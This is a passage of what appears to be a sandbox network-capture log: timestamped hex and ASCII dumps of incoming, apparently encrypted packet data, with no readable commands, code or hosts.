2023-03-02 16:19:42 UTC	343	IN	Data Raw: 88 0d 0a cd 0d 42 97 8c 2e c6 e1 fa 34 ff fc 81 66 4e 2d 2a 47 2a ca 97 a3 6a b8 06 85 36 c7 ff 2c 41 f0 04 62 f5 65 ac f5 55 cc 3c 1a 55 7e 79 7d ba a3 79 57 e5 1b 63 e5 ed 8c d9 0f 4f 85 20 58 82 39 16 c8 84 3f 0b 12 ab 02 be cf 46 ea 11 74 13 76 4e 91 b2 ec 36 18 8e bf 70 a7 97 3c ee 12 31 1e 01 4c 77 d1 a5 bd ef 54 ef bf 0d 2a 7c 58 bb fc 2c 6c 60 de 5a 55 2c bf 6b 37 22 51 a5 6e 9f 91 a0 27 2a 9c 99 dc f2 62 9e 56 d5 8a ce f9 b7 b5 52 1e 7c 5d 26 56 63 d5 6c aa 6b 07 45 40 77 ed d7 32 aa 13 76 18 34 c0 55 a8 62 1e f0 db 41 e5 4f 6f 61 a8 2b b5 1f 43 b6 20 b0 25 61 1e 07 9f 75 f5 0f a3 a6 30 4a 4a 79 25 34 f3 c2 45 02 7b c2 6e 0d 1c 29 2a e2 06 20 a2 ea 14 5e 71 52 83 88 7a 28 b6 6f 33 92 ca a4 f8 41 d9 98 01 1d 01 4b 85 3e 19 14 5a 28 d3 77 26 29 15 Data Ascii: B.4fN-Gj6,AbeU<U~y}yWcO X9?FtvN6p<1LwT\|X,l`ZU,k7"Qn'bVR\|]&VclkE@w2v4UbAOoa+C %au0JJy%4E{n)* ^qRz(o3AK>Z(w&)
2023-03-02 16:19:42 UTC	344	IN	Data Raw: 3f 28 88 ed e1 4d 1a 5f 9a e5 8d 4e 56 b2 43 f0 44 80 de 88 2f d3 1e ca 2e 19 7d 71 bf 8d a1 a6 58 b1 38 29 1e 0c be 8e 12 08 3c a1 60 7c 8b 97 07 61 60 c6 06 47 b6 23 d8 43 b6 a7 6b 6a 2d e8 16 90 1e 72 b9 66 84 72 e1 82 19 44 b9 f6 2b 4c 4c ad cf 7b 59 6d 94 b5 cb d6 6b a7 5e 20 c9 cc 66 ac 23 e6 16 43 b1 b8 19 eb 1f 7b bd a7 72 24 04 de db f4 37 50 91 74 d8 ea a7 54 f0 0e e8 6a 09 05 e7 4c bd 8a 11 2c 5e e8 4f c8 3c 5f ba 81 60 0f ea 47 5f d9 f4 8d 88 93 dd ee 29 cc e4 66 34 29 62 2e 97 1b 02 c9 64 35 de 12 53 d4 0b 8c 57 01 97 61 5e b8 e5 f4 9b c4 57 72 5e 12 40 02 a5 a7 bb f0 c0 21 e8 6d fa 5e fe c0 ee c1 8f 18 7e 5c 49 8f d9 b1 5e b1 6b 24 b7 84 3b e4 61 30 b9 bf e7 39 a6 97 04 a0 bd dc ae ba 5f 6b 2e b3 04 3e 88 45 e3 56 bd a5 00 97 b9 dc 9e a0 31 Data Ascii: ?(M_NVCD/.}qX8)<`\|a`G#Ckj-rfrD+LL{Ymk^ f#C{r$7PtTjL,^O<_`G_)f4)b.d5SWa^Wr^@!m^~\I^k$;a09_k.>EV1
2023-03-02 16:19:42 UTC	345	IN	Data Raw: 16 5b 6c e5 38 2b 8d ec e9 48 a9 b6 e6 0b ac f8 fb 74 1c 78 1c e0 e4 19 77 12 7c 42 84 7e 90 ec b0 f1 f3 dd a9 8a 3e f3 2b 7a d6 a8 30 16 b1 90 2c 8b 6e 36 16 a5 d4 02 f4 4d 0d ca 66 f8 22 b5 4b 56 d7 9f dd e9 84 e3 a4 1a b0 ca 31 e4 d1 41 60 8a a2 45 05 e7 45 9c 32 80 34 a4 d6 ed 26 10 3d 41 db ab 35 cb fb db 8a 15 fb 13 91 1e 44 63 51 ba 6f 27 e8 14 29 21 be b0 17 1a d2 0e fc 7b b5 a3 75 5f 05 68 7e ad 68 41 15 fd c4 57 4c 9c 47 4b 3b 94 f9 73 f0 e9 2f 67 1f b0 48 14 a8 28 6e fe ae 12 07 60 50 b8 f3 ce 82 8e 8e a5 bb 06 db 45 b2 b7 69 1e c4 3a d4 2a 86 00 4a eb 17 0f 4a 21 16 8c ca 08 25 2d 6a 8f 11 44 ce d5 7b 02 69 7d d6 9c eb 8d de e2 9d df 6e 0f 23 0d c8 da 8d be bd 53 d9 b6 0e 93 86 63 9c d3 90 e7 9f dc 65 57 3a c6 e1 67 f9 a0 5b 2b e1 ad b1 5e 21 Data Ascii: [l8+Htxw\|B~>+z0,n6Mf"KV1A`EE24&=A5DcQo')!{u_h~hAWLGK;s/gH(n`PEi:*JJ!%-jD{i}n#SceW:g[+^!
2023-03-02 16:19:42 UTC	346	IN	Data Raw: 43 7c 9e 72 c0 70 f6 45 31 a2 e1 a0 38 71 9f e6 5a 77 98 74 42 8e 43 42 c0 72 ba e5 cf b7 bc cc 7c 48 bb 23 25 76 3b 50 f3 5a 2e 4e 80 aa bf d3 c3 3b b1 51 5a dc a6 61 a1 1b f8 2d 54 c6 b3 88 f5 66 18 a2 c4 23 12 0d 1f 20 f5 85 f8 1c b5 34 e4 dd 47 57 1e 2b b7 cc 42 8d 45 6a 42 b3 48 2b 4e 5a 4e 85 3f 5d 7e 86 97 57 8b 0a Data Ascii: C\|rpE18qZwtBCBr\|H#%v;PZ.N;QZa-Tf# 4GW+BEjBH+NZN?]~W
2023-03-02 16:19:42 UTC	346	IN	Data Raw: 68 9e 57 27 6e bc e5 1d 27 20 48 7f 29 7e f0 6d d6 52 2f 03 0e 41 d2 c2 7e 9c 40 d0 00 ca a1 41 76 9f 15 ab 40 38 cc a6 b2 98 f4 62 ec 94 bc dc 3b c4 2c 8a 14 cc 52 01 9e 6b 66 93 ed 9a b7 2f 5b 4e 88 d1 4f 8e bf 84 23 71 1d f7 5e dc 36 aa 6d 8c 67 76 db 39 d8 86 61 b3 fc 07 fe aa 61 d5 e5 60 67 ee 91 6a 17 0d e7 78 ee 75 90 e3 22 19 40 f7 6f 76 2c 7d 37 58 76 f1 c9 5f 49 77 48 29 48 fe 4a ec 56 af 72 7b d8 cd 3c 0d 59 e4 f8 0b 3d 21 d7 98 b7 92 e0 af 2c 6e 24 d3 91 ee 50 62 51 b9 47 d9 43 7b 8f 6c 7b a2 2a 08 08 2d 65 12 e2 d7 20 05 43 1e 75 01 9c 45 3c 8d 88 04 4e 34 fd a9 f1 22 85 d1 3d 5f 05 e6 72 cd d1 42 e4 93 f1 77 ea ef f3 e5 df 8c 31 b2 7e 3f e9 7c 80 a4 dd 13 eb 9c 75 82 54 e8 3c 9d c4 d8 1d ad 12 c0 86 1d 32 d6 e9 e9 5f db 23 4c 84 92 51 02 58 Data Ascii: hW'n' H)~mR/A~@Av@8b;,Rkf/[NO#q^6mgv9aa`gjxu"@ov,}7Xv_IwH)HJVr{<Y=!,n$PbQGC{l{*-e CuE<N4"=_rBw1~?\|uT<2_#LQX
2023-03-02 16:19:42 UTC	348	IN	Data Raw: 74 81 80 a1 e9 e1 f0 25 46 48 2c 36 33 24 91 2e 99 b4 98 95 4e 97 76 85 ef 0c a7 5a cf d1 e7 98 a7 0e cc 4e c3 2a d2 01 4a 7c ec 30 88 91 9e 31 57 23 29 0f c7 d6 4b d9 21 e3 4f ce 16 70 45 bc af 95 de a7 74 8f 24 54 a8 e1 be 2d d7 d9 c5 2c 65 ba b5 04 5c ff b4 ce aa 55 58 30 9b 78 96 b8 c1 6e 72 06 7f 3e 9d aa 5c 69 cd b4 3e 78 12 37 9c 74 46 ad 10 91 80 f3 03 63 73 93 c2 d5 e6 d6 c4 9c 0c e1 07 44 5b 38 2b f4 bf 39 24 94 95 a1 b9 39 6a e2 5a 28 45 ee 92 8d 4d 8d 8e b6 14 08 82 e2 94 03 b7 60 03 c5 9d 1a 0a 5e 03 6f 00 26 35 8a ba fb 7b 3b 69 9d 2e 7c 8b 6e f6 4a cd 96 c1 a8 a0 86 4a 20 27 f1 69 7c 18 a9 c9 50 30 ec e4 e8 65 11 ec ea 59 e0 d5 4f 1b 1a 04 a6 f4 a7 80 8c be 62 1e 9a d4 d8 40 52 06 da 5c 0c 1e a8 a1 6b b3 c9 bf f9 29 82 12 eb b5 9c 57 6f 31 Data Ascii: t%FH,63$.NvZN*J\|01W#)K!OpEt$T-,e\UX0xnr>\i>x7tFcsD[8+9$9jZ(EM`^o&5{;i.\|nJJ 'i\|P0eYOb@R\k)Wo1
2023-03-02 16:19:42 UTC	349	IN	Data Raw: 55 8c 63 0d 33 a5 d2 49 e8 00 e1 93 b0 0c 69 1d cd 38 20 29 b4 de c2 d1 e8 c4 35 c0 c6 5e d4 9f db 5e fb 1c 47 62 c0 ab 78 c7 5d 39 73 d5 dc 96 29 71 9d f7 c6 04 df f7 2c b8 1f cb 8c fa 68 55 73 e5 4d b9 69 19 74 62 7f 7b 45 7c e4 7f 87 f3 e4 9b 27 6f 3f 4f fb 90 31 93 b8 74 ab 84 f4 5f 2e 67 84 dd 02 ed 9d b9 97 aa 35 c5 c2 6d da 1d da d9 15 aa cc b4 13 4a ca dd d8 7b 03 36 6c 15 9d a2 f3 08 eb c2 c1 f3 d5 4c 97 65 53 42 53 11 cb 67 68 0a f3 8f ab 25 1e 6c d6 9a 03 b5 f1 74 2a 23 da f1 e9 2d 81 4d b8 13 eb 45 d8 6e 57 84 74 ba c0 c0 02 be 71 84 2b c6 ec 71 d3 23 9a b5 33 93 af 29 7c 22 d0 6e 1f 79 5c 6f 91 40 8a cc a8 89 34 89 40 77 d7 d6 e7 da aa 56 c3 0e 31 ed 05 3c 8f f9 1c 1e cc 90 ee 98 ea 5e f7 9b 15 de ac 45 3d f2 03 d0 54 6e 40 ba 30 6f ab ac a4 Data Ascii: Uc3Ii8 )5^^Gbx]9s)q,hUsMitb{E\|'o?O1t_.g5mJ{6lLeSBSgh%lt*#-MEnWtq+q#3)\|"ny\o@4@wV1<^E=Tn@0o
2023-03-02 16:19:42 UTC	350	IN	Data Raw: 7b 36 64 b3 a8 2e b8 ee 2e 0f e1 40 a9 72 38 a5 16 05 12 62 0d f9 16 b2 91 93 f6 63 f6 80 9d 16 16 d7 1d c1 c4 a9 62 91 11 c4 7b 96 f0 e6 b2 1f de c5 01 eb c8 1d 76 85 e9 e1 87 75 3c 1f 03 fd 02 44 56 bd 1e f9 70 60 f8 9d aa 11 45 48 58 cc b1 e7 20 d5 56 10 1a db 10 f6 04 4e d2 01 d7 c5 f6 77 36 c5 da 57 b7 86 14 15 2c 9f cf 09 48 f1 eb f1 b9 46 71 e1 7a 80 d9 4d a5 dc b5 26 6b 06 fe 2f bc e3 12 7d a1 38 7b 7e b1 bd 58 68 04 5b 4c a7 18 0b 1d 2e 48 88 fa 89 23 9d 8f ce bc 63 46 31 cc 7a 66 33 43 fa 42 3c 34 cd 77 4c a3 df cc 97 ff 7e a7 c3 95 2b b2 0b a5 f5 b8 11 fc 75 81 3d 74 cc d6 ca c6 81 e4 d3 87 6a c4 7e e1 eb 9e d2 ee 74 da 44 dc d9 de b0 22 43 fb 34 3a 89 9b af a1 f5 e5 2a 69 27 8e 33 0a cb 41 e7 35 99 44 e0 29 e2 4d 96 9c f5 74 b4 a9 68 28 c1 59 Data Ascii: {6d..@r8bcb{vu<DVp`EHX VNw6W,HFqzM&k/}8{~Xh[L.H#cF1zf3CB<4wL~+u=tj~tD"C4:*i'3A5D)Mth(Y
2023-03-02 16:19:42 UTC	351	IN	Data Raw: db 08 38 d5 4e 74 a3 8a da d9 e6 08 de c1 bf 4d 10 e8 4f d8 85 5d b3 53 0f 30 b5 da e8 d1 68 22 95 2a b5 65 8c 60 a5 18 7f 55 e5 3c ea f4 20 b0 c5 32 9e 78 2b 37 4b 7e 76 f0 a0 24 95 d1 06 5a de 29 da 8b 0c da d9 61 ba 4a 0b 7b 4f 5a 3f cf d7 d8 ae d0 d5 5f 51 d1 e9 e4 60 72 d3 c7 a2 98 e4 f9 67 4a 8e 62 91 48 8a 7f f7 03 df b2 4b 8c 35 23 b1 69 20 ed 89 2b 63 2a d4 ce 0a 0a a1 e7 84 c5 d7 c0 1b a5 c4 b1 c6 58 60 81 62 e4 ee 0e c9 bd 15 e3 26 ff eb 42 b8 e2 b9 e1 cd 01 05 98 6a 1a 6d 3a 9b cd 0d 64 0e 69 20 c9 8c f5 74 7a 52 60 15 14 c6 7c 62 16 6b 0e 7a 28 8b 5e 3c df 91 57 57 7f b0 d1 80 48 bb 35 a8 e6 24 99 d0 1b 3c 14 de f6 b3 6e f1 e6 77 9e 10 43 14 d9 f5 06 d9 69 73 46 73 47 7a 65 11 a7 be 78 fb a5 d1 62 df c9 61 09 4b 84 34 47 32 29 10 3d 7e ff ad Data Ascii: 8NtMO]S0h"e`U< 2x+7K~v$Z)aJ{OZ?_Q`rgJbHK5#i +cX`b&Bjm:di tzR`\|bkz(^<WWH5$<nwCisFsGzexbaK4G2)=~
2023-03-02 16:19:42 UTC	352	IN	Data Raw: 09 f0 f0 3b cc ad 9d 43 2f 1f 5f af 99 50 e0 0f 0d 1d 89 ee e1 7d 6d 75 57 18 fc 61 06 8c 10 d9 66 9b 38 63 aa 60 c5 44 c4 b7 f4 31 e5 e1 1f 94 44 29 4e b6 a1 aa 04 aa 3a 76 5b 60 b3 05 b7 8c 34 24 65 44 0b fe c3 1e ce 62 74 d1 dc 5f 58 fc 7b 09 78 82 65 4a 54 80 45 39 1e 84 67 86 70 6a c4 a8 e3 e3 a8 2a 9c 89 86 bd 03 e0 95 ac 5a a2 29 3b 16 78 cb 41 7d ad 3e b7 1b 64 3c 6c 51 57 78 82 5f 82 ac e3 4c 49 06 8a 35 6f cc 05 66 73 72 32 85 3b 9c b3 be 2f a2 8b 9a 9e ea 99 97 42 64 df 94 99 c2 2e 5d 9f 49 44 2a 25 07 06 1a b6 5a 61 99 94 eb ea cf 44 1a 9a 0e f1 1b f3 fa 71 fb c5 9b a4 40 ec 0e 0e b2 f9 ee 2c db cb d8 fc b4 0d 9b 82 04 fe 96 c4 ae 3e b8 b1 25 34 6e 73 fe 88 cd c3 b2 40 68 c8 d1 3b e1 bf 85 62 39 46 09 a5 51 05 24 17 01 d4 17 79 13 16 10 67 07 Data Ascii: ;C/_P}muWaf8c`D1D)N:v[`4$eDbt_X{xeJTE9gpjZ);xA}>d<lQWx_LI5ofsr2;/Bd.]ID%ZaDq@,>%4ns@h;b9FQ$yg
2023-03-02 16:19:42 UTC	354	IN	Data Raw: 7c 9f 8e fa f8 2a d8 9e 18 35 c8 63 c0 0b f3 1a 4a 7d 93 6b 12 e1 2d 1b 12 e9 4c 64 42 0c 84 ae 99 d9 bc 64 a9 1a 68 da a3 b7 a0 31 70 9e a5 b0 35 5c 7b c2 c1 45 bd c0 25 a6 4f 3d 88 32 e2 a5 6e 1c 2d a5 c9 56 3f 2d 66 15 6a 28 c7 b9 5b e0 ff 40 cc e0 de 6a 7b 05 bf 8a 34 52 93 69 95 9a 1e 7b 57 2b a9 a4 46 1a 61 27 3a ae a2 92 7a 80 7d b6 cb ad 58 97 f2 64 30 c4 4a 0d 89 27 73 df 05 33 88 c2 e0 f2 c2 28 0d b4 42 4d 61 5e a2 37 0e c5 4b 63 77 d5 bc e3 cb a6 29 78 e0 15 ed 47 71 29 87 ef 98 c5 35 8c 29 f8 70 96 c7 c6 b4 2d c1 77 c5 df a7 07 99 23 00 2d 74 f5 cc 8f 48 04 03 35 0c 21 1f 8a 2d c8 4b f4 30 9d 97 88 63 75 2c 8f c3 cf e1 41 c5 32 4f 9f 6c 8e 3d 50 28 fe 5f 96 c8 7f f6 7c af 25 58 d8 32 37 52 ff 67 34 6a dc cb 31 8b 9e ee 27 54 18 70 28 62 7b 66 Data Ascii: \|*5cJ}k-LdBdh1p5\{E%O=2n-V?-fj([@j{4Ri{W+Fa':z}Xd0J's3(BMa^7Kcw)xGq)5)p-w#-tH5!-K0cu,A2Ol=P(_\|%X27Rg4j1'Tp(b{f
2023-03-02 16:19:42 UTC	355	IN	Data Raw: 29 4a 5c b5 c3 17 eb d1 3c 05 d3 00 8d 11 63 7a 78 3f 58 65 01 77 09 7a b6 ff e3 3e 9e d6 b6 6e 92 ad 25 26 1f 9d 50 29 90 2f 19 1c 00 a6 55 67 b5 ce 98 86 36 ef 62 36 2a 04 c7 fd 92 e3 ae a2 08 80 3c 47 fa f2 a9 0a 88 65 64 a7 93 7a 0b 53 3d b8 a7 5d f0 13 02 93 bb 4d 21 d1 be 36 78 19 87 83 96 76 38 89 81 2c b3 0a e5 a3 e1 49 fd 18 d5 e9 8f 4a 33 d4 fd 5a 74 72 80 4b 9a fe ec de 93 c2 25 8c f1 f7 08 1d 62 57 17 ba 90 10 20 4d c7 33 76 11 46 88 78 86 38 44 e0 6c ef a7 32 ef 8e e4 b2 10 5c 0c 3d ad 69 57 ce ab 37 24 5e 16 8d 05 10 a4 24 a0 16 77 f9 b0 e6 ba 88 dc 20 a9 50 b6 ce 03 fa 7a 46 5b 3d a5 91 93 dd 24 a6 e5 16 81 45 7b 3c 9f e3 cc 49 1c 2c ff fe 86 7d 7a 22 2f 40 49 1b 5d 44 ae d4 1f c5 6a a4 61 c9 23 e6 51 32 f9 48 b6 12 32 25 dc 9d 7f ad 5e 09 Data Ascii: )J\<czx?Xewz>n%&P)/Ug6b6*<GedzS=]M!6xv8,IJ3ZtrK%bW M3vFx8Dl2\=iW7$^$w PzF[=$E{<I,}z"/@I]Dja#Q2H2%^
2023-03-02 16:19:42 UTC	356	IN	Data Raw: 3f 17 78 db 2b a8 09 c1 97 95 05 7c b0 47 f7 f6 d7 3e db db 56 33 40 0a c5 78 15 cd 4c 0a 35 7f 23 00 f6 38 3b 03 8f 32 02 1a 9a a8 fb 3f 22 fc 60 20 42 44 87 20 fd f7 79 06 75 60 52 7f 3e c7 ad 93 aa 95 12 0d 1f a2 99 9e e5 49 38 d2 ad cc 7d f8 32 91 0d d8 b7 14 fe b0 fa 35 1f da 3c 4f 70 39 7d 71 3b f6 53 0a 7f 95 34 76 43 22 91 db 76 22 b1 17 19 86 30 63 81 fa 47 36 64 3a fa 82 70 4c f9 39 e7 91 85 d8 46 b6 fe e8 a4 0e 93 d6 f1 bf 21 12 a9 96 64 a9 d9 98 1b cb 1e 44 28 dd d3 0d e4 50 49 a7 1d ed f1 04 3f 56 4a 3c b7 08 77 c6 c5 d7 a2 78 e8 7d bf 4c 01 f4 06 dd f5 e0 66 98 67 17 ed ab 4d 74 b7 fd a1 c8 c2 72 d6 b1 22 c7 6d 70 49 b1 f0 a0 ce 61 3a 41 12 4b 78 4c 44 5d c7 6b 15 4d b4 a8 ed db 30 e4 44 e7 a0 c1 d8 b4 2d e8 7a 5d 5a 6b 8b 7e 2d 3e 2a 22 b7 Data Ascii: ?x+\|G>V3@xL5#8;2?"` BD yu`R>I8}25<Op9}q;S4vC"v"0cG6d:pL9F!dD(PI?VJ<wx}LfgMtr"mpIa:AKxLD]kM0D-z]Zk~->*"
2023-03-02 16:19:42 UTC	357	IN	Data Raw: e5 87 06 cd 0a 7f 76 30 d3 3d 97 07 ea 81 04 7f f2 4d 82 f8 37 57 43 c3 d6 35 47 c4 13 dd a9 74 df 2d 1f 41 d2 e4 7d 7d b4 e1 d2 c1 f2 ed 36 17 ad 0c 08 e4 83 d6 38 26 52 28 4c 42 1e 0c fd ef 2a a3 97 ff 95 d8 b3 ce f3 45 fc 29 68 6c f2 f3 c4 4d 71 ef 8d da f1 70 f4 76 24 9f 9a ee 58 99 8b 98 fe a8 e4 a5 1b f4 b4 52 94 1d 01 e4 f7 2a 08 56 af 7a d0 73 b3 1e 0a b9 c4 76 9d d8 09 ce 86 a8 a6 25 4b 3c e8 4f 6c 2a 0e ca fa a1 67 a3 f4 4f d9 ef 10 ec 67 6d 82 58 da db 03 cc 82 1e dd 58 70 11 15 88 f3 b5 e6 c7 9d 28 93 b0 fd fc 6d 5b 4d f1 fa 73 10 9f c8 cd 75 11 57 b0 8d 74 1c 2e 1c e6 38 9f 38 e2 82 24 24 40 bd 32 06 95 d0 5e d5 d0 6f f6 f1 c5 35 ff 5c 82 54 99 fe 66 ff 5c 45 75 72 64 f8 15 c8 3c a3 a2 8b 9b 35 4a d5 31 c5 fa 98 78 66 63 c9 7f ed 60 b6 6d 2e Data Ascii: v0=M7WC5Gt-A}}68&R(LBE)hlMqpv$XRVzsv%K<Ol*gOgmXXp(m[MsuWt.88$$@2^o5\Tf\Eurd<5J1xfc`m.
2023-03-02 16:19:42 UTC	359	IN	Data Raw: 3f 4f 58 d7 9a 25 11 bf 86 47 d3 a5 07 03 27 63 41 98 af 36 cd 48 9e 44 04 61 55 79 53 05 5a ca 78 8f e3 96 2e 8f 38 64 a1 ff 9c 03 5b 5b c0 0e 30 a5 37 22 03 0d ab b2 e2 0d 55 b5 82 5f d1 1b a3 71 7a d4 2a 3e d9 21 b8 af a7 2a 77 ad ca 48 85 11 84 ba 26 74 f2 72 68 bb cb 2e eb b7 ea 9c dc f5 3c fe cf f8 79 9d df db 89 79 44 14 b7 1f 00 39 2c d1 37 ad d4 a7 7b 99 ec 74 db 47 95 73 2a 44 44 16 be ed fa 27 3f 50 40 b1 00 fa 36 38 14 58 8c 36 5d 90 1b 46 6c bd 93 12 31 51 91 4f 9c 28 18 7b 74 f3 5e 1d ac b2 16 4c 2f 1c ed 6d 1f 3d fa 12 da a1 1f 99 93 f3 54 d9 f3 89 be 7b 78 2c e1 43 35 6f d7 5a 12 34 65 53 5e 6b bb 97 e7 3e eb c2 70 30 ce 04 3e 0b 92 bb 70 96 fc 3a 7e c4 97 fd 65 ba 4c ce 23 e0 c7 32 bd 0a 1b 5a fb 44 8f d6 63 a8 51 a9 b3 33 46 df 21 11 19 Data Ascii: ?OX%G'cA6HDaUySZx.8d[[07"U_qz>!wH&trh.<yyD9,7{tGs*DD'?P@68X6]Fl1QO({t^L/m=T{x,C5oZ4eS^k>p0>p:~eL#2ZDcQ3F!
2023-03-02 16:19:42 UTC	360	IN	Data Raw: dd 49 db dc 1a 21 0e 25 17 1f 81 8c 23 11 de d8 d4 f3 d8 09 08 12 72 53 68 02 65 ff b8 8a d9 8f 91 d5 ed 10 f9 1e c9 a3 9a c4 44 ac 16 cc 40 42 c0 11 f1 f6 53 47 fd c3 0f 4b 9a 61 40 5c 50 2b 7c eb 28 04 72 05 94 1e 30 0f 21 ec a8 e2 93 cc 2d 79 6d c9 65 e2 e5 84 23 b5 c2 04 cd 72 95 54 ca 4d f1 8b cc 7c b4 02 45 58 64 1f 9a cf c3 43 ff 68 fe d6 ab 6d 9b 46 92 58 be 54 f5 c5 ce 83 29 0b e5 b6 23 71 bd 00 b9 69 7e 60 81 a6 ef b4 d5 14 3e b0 2e c7 71 86 9f 3e cf 70 0c 8b 03 7c 2e 86 c1 f4 87 ff a0 58 a6 ad 7b 46 bf 0b 47 a2 6b 4b 3b 2b b6 56 9b bd eb b9 03 1d fe 49 7b 97 41 57 04 3b ce 77 34 af f7 fd f0 e9 52 e4 6b f3 a7 19 cb ff 6e 9c 88 8c fb c6 b2 84 e5 e4 eb 30 bb b9 19 c8 36 a2 2e 16 ca 01 85 97 a6 0b 1c d9 c7 a5 49 90 9b 2a a7 f2 80 aa bd c4 98 61 20 Data Ascii: I!%#rSheD@BSGKa@\P+\|(r0!-yme#rTM\|EXdChmFXT)#qi~`>.q>p\|.X{FGkK;+VI{AW;w4Rkn06.I*a
2023-03-02 16:19:42 UTC	361	IN	Data Raw: 7d f0 1b 1a 1b 4f e8 68 0c e4 a4 71 27 db d6 e1 1c 70 18 04 51 74 70 d9 5a 24 57 1b 71 78 0d f1 b3 eb 34 a2 b6 a0 9d 70 7a f3 fb 71 ab 42 67 7a 91 c4 14 5b 64 f9 06 1c 8f 49 ae f8 4b 42 8d 81 63 2f 9b c7 ee 3c 59 a8 fb 33 d7 c1 23 78 46 f2 7e 61 68 37 2a f5 64 f8 7f 37 67 84 2d e6 a6 c3 da 01 f5 18 41 98 2a 22 9a aa fe 34 61 b1 3a bb bb da 37 6a b6 98 27 39 9a 4d 0e ca 57 2d b2 b5 e9 b4 e5 00 aa e1 fb b4 ed 5b d3 56 64 6f ab ce 61 6c d4 b0 00 24 f9 f6 6d 96 bc 93 ae e8 57 43 09 9e e3 cb 8f 35 6c b1 22 fc ae e2 86 46 8b c4 b6 2f 8e 46 fc 98 fd 6f e2 cd cf 84 de 58 3d 1f 56 5f b1 2b 94 3b 81 a8 ea 77 6d dd d5 18 80 8c 65 1a a5 c4 6f b7 d9 52 8c c0 a9 04 a4 d8 12 5e ce 4d 8f 50 92 1c 4b 93 2c b4 c5 7f 68 b1 3d 2b 83 94 ed bb 7b 81 5c 34 52 c3 ea 43 81 6a 75 Data Ascii: }Ohq'pQtpZ$Wqx4pzqBgz[dIKBc/<Y3#xF~ah7d7g-A"4a:7j'9MW-[Vdoal$mWC5l"F/FoX=V_+;wmeoR^MPK,h=+{\4RCju
2023-03-02 16:19:42 UTC	362	IN	Data Raw: 0c 84 f6 5f e3 17 67 77 36 a2 50 10 b5 f8 5c f7 9d eb 2f 5d 83 15 a9 ab f3 6c a4 cf 14 1a cd dc ff 26 04 12 72 ac 96 83 45 aa 7c 40 a7 7a ff 17 4e b1 87 16 73 53 b1 fb aa 88 8b 1e 06 c9 a6 c3 0a 9c 26 e6 33 ac de 51 2c f2 f6 65 77 31 03 bf f9 d3 cb 40 36 c8 da 61 24 89 3d 7c b2 fd 18 ee 7c 37 69 86 cd f3 72 ae 71 91 35 3b Data Ascii: _gw6P\/]l&rE\|@zNsS&3Q,ew1@6a$=\|\|7irq5;
2023-03-02 16:19:42 UTC	362	IN	Data Raw: c1 35 97 78 47 ae 21 1c 18 59 bd ba a0 d9 c8 0f 28 74 6b 21 bd 47 53 c1 1f 74 59 a0 ae 9e d0 f5 83 cb 8c 2c 67 29 d9 90 ba b4 6d 42 d1 75 7f 5a ab 1a 9d 07 bd ab 92 02 0d 60 89 07 ea a2 ae ec 4e b9 c2 0b 9d b6 52 fa fe 47 c2 de 1d 14 b2 84 73 0f 91 e2 46 80 69 a7 5b e0 fc 98 35 0f 78 d5 3f 1b e3 03 54 67 93 72 8c ec df 54 ba 3a 04 5a f7 0e 50 8d 23 2f 61 e3 2a 45 84 2e 14 66 a4 3f 14 7b 7b 0d 6b b9 e3 fc e6 a4 0f 6f 0f e4 67 60 56 da 2e 61 2e 9e e6 fc 7e 16 32 37 f9 95 db 8e 53 0b b3 e1 04 08 96 da f4 ac ce 97 d2 95 85 4d 9b 96 3a 06 c4 4d 71 d8 c3 c0 38 f3 94 cb 4f 4f 50 51 0e 31 d3 a7 b0 35 5f 78 30 f8 c8 7e 95 56 78 da f5 cc e4 38 e6 7f 67 e7 f6 79 62 8e 6f 33 29 11 b8 1c f7 12 da 4b ed e3 6b 86 f7 8f 56 91 99 ad a8 af 29 2d f2 50 e0 3b 46 39 05 c4 b5 Data Ascii: 5xG!Y(tk!GStY,g)mBuZ`NRGsFi[5x?TgrT:ZP#/a*E.f?{{kog`V.a.~27SM:Mq8OOPQ15_x0~Vx8gybo3)KkV)-P;F9
2023-03-02 16:19:42 UTC	364	IN	Data Raw: 0b 4f 1e 70 95 d7 12 36 e7 34 77 0d 85 75 ba 5a af ae b8 64 91 e0 b9 5e 2f 05 f2 b9 a3 ef 37 00 45 1c 6b 25 8c 5b 71 db 63 27 b0 d9 3d bf 09 ed 11 60 87 d8 09 f6 43 15 f7 a0 ca ae 82 64 01 3d 0b 95 5b 34 9c 0d e4 c7 ca 21 fc 94 64 0e 59 c5 32 40 a3 09 f3 c5 c2 f9 ff 3e d5 31 f7 99 4d 8b d9 13 55 79 c8 64 ba be 7d 8d 75 2a d8 80 29 bb 8f 92 bb 82 a4 57 66 cc 9e f0 c3 30 42 53 6e 2e 20 da 35 f6 37 9f 63 ee ca 5e 87 8f 71 2f 65 c3 54 49 de bb 08 3f 29 03 4e 5e 11 3b fa 39 dd 92 22 a4 03 41 a6 8e 98 0c ff 60 e9 38 39 31 22 bf 35 e5 4c e3 29 90 76 17 6d 1f 6f 6e 75 e7 27 2b 47 46 a1 01 09 1e 5e 94 e4 01 66 cc ab 89 d0 e3 88 98 7d 2c ed 37 80 50 72 45 b9 95 7c bf be 99 ad 47 f2 2e 6f 31 e4 fa fa 64 d7 0c c4 df a7 67 32 82 2d 95 4f 69 7b c8 47 24 4f 9b b1 24 49 Data Ascii: Op64wuZd^/7Ek%[qc'=`Cd=[4!dY2@>1MUyd}u*)Wf0BSn. 57c^q/eTI?)N^;9"A`891"5L)vmonu'+GF^f},7PrE\|G.o1dg2-Oi{G$O$I
2023-03-02 16:19:42 UTC	365	IN	Data Raw: 13 32 de 37 41 22 b3 05 56 75 08 7a 31 41 4d d1 48 38 49 13 25 cc 8f 6d 64 6d 13 57 5f 7a a5 44 4e e2 66 cc 7e 5f 7e 62 2f 84 4b 48 7e 1c d8 62 6d c4 e6 f7 c0 67 24 d2 e7 92 86 2e 95 3d b3 fd 7b ff 03 62 b1 5c af 0a ff 02 02 85 46 d0 8f be be 69 0c 0f e5 3b 6c 33 3e 55 8b b8 8e 0a a7 69 f9 72 09 23 92 b8 b5 ee 45 77 d7 10 50 20 2b fa 3a a0 6a 43 3e 99 77 79 7b 08 0c 72 a6 f7 d5 08 0f ec 16 15 2c 23 c3 df 48 cd 7f 0b a9 46 c5 72 a4 a0 5e d0 3f 5b f8 d9 2b d1 48 6b 14 5b 23 da 91 fb 59 d3 c9 cc d1 73 08 d4 98 83 6a a9 9e 47 b5 4a cd ae 3b e0 7c 23 f8 a7 52 e1 e3 db f1 04 bd 6d e6 4c ab 0b e7 63 0a 98 a4 8f 15 19 8d 9e 85 47 09 76 0e 47 c0 b7 10 5b 26 33 df b3 03 d4 09 a7 2f 05 64 d4 59 23 78 34 a9 99 2e 6f b4 4e e8 09 17 ce 9b 6e c2 ec 58 55 e1 9c 03 